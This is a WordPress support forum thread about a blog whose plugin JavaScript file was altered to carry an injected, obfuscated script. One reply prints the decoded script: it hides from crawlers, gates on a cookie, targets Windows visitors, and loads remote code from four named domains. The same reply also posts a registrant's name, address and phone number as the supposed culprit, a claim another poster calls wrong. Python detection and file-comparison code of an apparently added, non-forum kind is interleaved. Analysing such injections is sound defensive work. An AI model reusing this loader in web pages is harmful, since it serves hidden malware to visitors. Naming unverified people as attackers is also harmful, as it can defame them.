• Resolved mutedgirl

    (@mutedgirl)


    So something very strange. Several people contacted me, saying that my blog was giving them malware warnings. I did the usual routine: checked my theme files, ran the Exploit Scanner plugin, checked the site myself (no message or warning for me), and nothing was out of the ordinary. The other weird thing is that some people said they only got the message some of the time; other times, it was fine.

    I had a visitor take a screenshot of what she was seeing.

    click to view screenshot

    As you can see, it lists sexybookmarks.js as the culprit. HUH? I checked the plugin files and nothing has been modified (and I’ve been using this plugin for months now with no issues). I deactivated the plugin and had her check again, and she no longer gets the warning.

    So! My question: is anyone else noticing this behavior?? It’s possible that it’s just something unique to different virus monitoring software (which would explain why some people see the warning and others don’t). I did some Google searching but this doesn’t seem to be a widespread thing… very very curious!

Viewing 7 replies - 1 through 7 (of 7 total)
  • That’s very worrying, and a method used by some unscrupulous coders to serve spam server side. I’m not saying this is the intention of this particular plugin, but having upgraded I have encountered a few issues with WP 3 and am seriously thinking of going back a version and ripping out the admin callback so I don’t get the upgrade notices, which, to be honest, I’m always trying to find any worthwhile difference afterwards.

    @mutedgirl:

    Indeed very curious. I can assure you that the plugin contains absolutely NO malware, spam, or anything else even remotely dangerous in its initial packaging…

    However, after taking a look at your file… It does seem that you’ve been hacked. Take a look at the following file:
    https://jayesel.net/wp-content/plugins/sexybookmarks/js/sexy-bookmarks-public.js

    You’ll notice the long string of garbled JS at the beginning, followed by the normal JS which comes with the plugin. It looks as though someone has hacked your server and appended some JS to your public javascript file included with SB.

    You can download the plugin again directly from wp.org and you’ll notice that the JS file does not include what you have in your JS file.
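The comparison Josh describes above (re-download the plugin from wp.org and diff it against the installed copy) can be automated. The following is an added example, not code from the thread or from the SexyBookmarks plugin: it hashes every file under an installed plugin directory and a pristine copy, reports modified, added and missing files, and for each modified file tells you whether the foreign bytes were prepended (as in this thread), appended, or spliced in at some offset. The two directory trees and their file contents are constructed in a temporary directory for the demo; point `compare_trees` at a real `wp-content/plugins/<name>` and an unpacked wp.org zip instead.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed sample content (not the real plugin file): the pristine JS as shipped,
# and a copy that has had an obfuscated blob prepended, as described in the thread.
PRISTINE_JS = b"jQuery(function($){ $('.sexy-bookmarks').show(); });\n"
INJECTED_BLOB = b"/* constructed placeholder for an encoded blob */var _0x=['x','y'];\n"


def sha256_file(path):
    """Hash a file in chunks so large assets do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root):
    """Map each file's '/'-separated relative path under root to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare_trees(installed_dir, pristine_dir):
    """Report files that differ from, were added to, or are missing from the clean copy."""
    inst, prist = tree_hashes(installed_dir), tree_hashes(pristine_dir)
    return {
        "modified": sorted(f for f in inst if f in prist and inst[f] != prist[f]),
        "added": sorted(f for f in inst if f not in prist),
        "missing": sorted(f for f in prist if f not in inst),
    }


def locate_injection(installed_file, pristine_file):
    """Describe how a modified file differs: bytes prepended, appended, or an edit at an offset."""
    a = Path(installed_file).read_bytes()
    b = Path(pristine_file).read_bytes()
    if len(a) > len(b) and a.endswith(b):
        return ("prepended", a[: len(a) - len(b)])
    if len(a) > len(b) and a.startswith(b):
        return ("appended", a[len(b):])
    i = 0
    while i < min(len(a), len(b)) and a[i] == b[i]:
        i += 1
    return ("diverges_at", i)


def build_demo_trees():
    """Create two throwaway plugin directories: the wp.org copy and the tampered install."""
    base = Path(tempfile.mkdtemp(prefix="sb-integrity-"))
    pristine = base / "pristine" / "sexybookmarks"
    installed = base / "installed" / "sexybookmarks"
    for root in (pristine, installed):
        (root / "js").mkdir(parents=True)
        (root / "sexy-bookmarks.php").write_bytes(b"<?php // plugin bootstrap\n")
    (pristine / "js" / "sexy-bookmarks-public.js").write_bytes(PRISTINE_JS)
    (installed / "js" / "sexy-bookmarks-public.js").write_bytes(INJECTED_BLOB + PRISTINE_JS)
    # A file the plugin never shipped: the kind of dropped backdoor a hash diff also surfaces.
    (installed / "js" / "extra.php").write_bytes(b"<?php // file not shipped by the plugin\n")
    return installed, pristine


def demo():
    """Run the comparison on the constructed trees and return (report, per-file details)."""
    installed, pristine = build_demo_trees()
    report = compare_trees(installed, pristine)
    details = {f: locate_injection(installed / f, pristine / f) for f in report["modified"]}
    return report, details


if __name__ == "__main__":
    report, details = demo()
    print(report)
    for f, (kind, what) in details.items():
        print(f"{f}: {kind} {what!r}")
```

A hash diff only tells you what changed, not how the attacker got write access; after cleaning the files, the web server account's write permissions, FTP/SFTP credentials and any other writable plugin directories still need to be reviewed, which is why the thread's advice to change passwords matters.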

    Thread Starter mutedgirl

    (@mutedgirl)

    I actually found a similar hack in another plugin as well (Multiple Column Blogroll Widget). That one was causing only some people to get the error, I think, because it displays links at random, 10 or so at a time (so only some of the time was the offending code being used/displayed). I removed that as well and so far, things seem quiet.

    I’m glad it’s not the actual plugin for sexybookmarks, because I really like that one. I’ve changed passwords etc. and I’m going to see if things stay clean, then start adding back in the stuff I removed while testing.

    Thanks for your response! This malware stuff is ridiculous!

    I agree, malware and spam are getting to be even more of a ridiculous nuisance now than they ever have been.

    Also, just for your info… The garbled script that someone put into the public js file for sexybookmarks decoded into the following:

    <script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="https://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>

    So I’m assuming the owners of:

    edisonsnightclub.com,
    gaindirectory.org,
    ideacoreportal.com,
    and
    karenegren.com

    are the perpetrators behind it.

    Registrant:
       IDEACore LLC
       22552 King Richard Ct.
       Beverly Hills, Michigan 48025
       United States
    
       Domain Name: IDEACOREPORTAL.COM
          Created on: 14-Jan-05
          Expires on: 14-Jan-11
          Last Updated on: 15-Jan-10
    
       Administrative Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Technical Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Domain servers in listed order:
          NS51.DOMAINCONTROL.COM
          NS52.DOMAINCONTROL.COM
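The decoded script above has a recognisable shape regardless of which domains it points at: it excludes search-engine crawlers by user agent, fires only once per visitor via a cookie, only targets Windows browsers, and writes a remote script tag with a randomly assembled hostname. The following added example (my own code, not from the thread or the plugin) turns those behaviours into a small indicator scan that a site owner can run over the JS files in `wp-content`, and pulls out the hostnames embedded in a flagged file so they can be blocked or reported. The sample scripts are constructed for the demo; the injected one mirrors the structure of the decoded script with placeholder `.invalid` domains in place of the real ones, and the indicator names are labels of my own, not any vendor's signature set.

```python
import re

# Behavioural indicators drawn from the decoded script in the thread.
# Each entry is (label, compiled pattern); the labels are our own.
INDICATORS = [
    ("bot_ua_cloaking", re.compile(
        r"userAgent[\s\S]{0,300}(googlebot|msnbot|yandex|bingbot|slurp)", re.I)),
    ("cookie_gate", re.compile(r"document\.cookie\.indexOf\(", re.I)),
    ("os_fingerprint", re.compile(r"indexOf\(\s*['\"]win['\"]\s*\)", re.I)),
    ("random_host_selection", re.compile(r"Math\.random\(\)\s*\*\s*\w+\.length", re.I)),
    ("remote_script_write", re.compile(r"document\.write\(\s*['\"]<script", re.I)),
]

# A quoted string that looks like a bare hostname (label.label.tld); URL literals
# such as "https://..." deliberately do not match because of the scheme.
HOST_RE = re.compile(r"['\"]([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})['\"]", re.I)

# Constructed sample: same structure as the decoded payload, placeholder domains.
SAMPLE_INJECTED = (
    r'var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,'
    r'c=navigator.appVersion;if(document.cookie.indexOf("watchtime")==-1'
    r'&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){'
    r'var d=["drop-a.invalid","drop-b.invalid"],e=["aqua.","blue.","red."],'
    r'f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);'
    r'dt=new Date;dt.setTime(dt.getTime()+9072E4);'
    r'document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";'
    r'''document.write('<script type="text/javascript" src="https://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};'''
)

# Constructed sample of ordinary plugin JS that should not be flagged.
SAMPLE_BENIGN = "jQuery(function($){ $('.sexy-bookmarks').show(); });"


def scan_js(text):
    """Return the labels of every indicator found in the script text, in table order."""
    return [label for label, pattern in INDICATORS if pattern.search(text)]


def classify(text, threshold=3):
    """Flag a script as suspicious when several independent indicators co-occur.

    Any one indicator (a cookie check, a user-agent test) is common in benign code;
    the combination of cloaking, one-shot gating and remote script injection is not.
    """
    hits = scan_js(text)
    return ("suspicious" if len(hits) >= threshold else "clean", hits)


def extract_hosts(text):
    """Collect quoted bare hostnames from the script, for block lists or abuse reports."""
    return sorted({m.group(1).lower() for m in HOST_RE.finditer(text)})


if __name__ == "__main__":
    for name, sample in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        status, hits = classify(sample)
        print(f"{name}: {status} {hits} hosts={extract_hosts(sample)}")
```

The scan is meant to run on the already decoded text; the blob as found in the file was encoded, so in practice the first pass is the hash comparison against a clean plugin copy, and this scan is applied to whatever that comparison turns up. The threshold is deliberately conservative: a cookie check or a user-agent sniff on its own is ordinary plugin code, which is why each indicator is scored rather than treated as a verdict.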

    These assumptions are all wrong, it’s an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not the “perpetrators” as per Josh, nor was it likely that the originating poster was.

    The Phoenix Exploit Kit has been implicated in issues in the realm of these posts.

    It’s not a good idea or fair to publish the data above when you’re not certain about the facts, as erroneous information defames the parties.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains don’t show any involvement with this attack and are clean.

    Sahaskatta and Josh Jones, to be most accurate and fair, you should remove these errant publications of opinions/assumptions about the domains and registrants.

    @simka:

    As I mentioned above, that was only an assumption. I’m not a hacker, nor do I know much about hacking at all… I simply made an assumption based on the facts I saw, which was that those domains were being flaunted in the hack.

    At any rate, it’s been far too long since this post was created so I can’t edit/remove my response.

  • The topic ‘sexybookmarks seen as malware?’ is closed to new replies.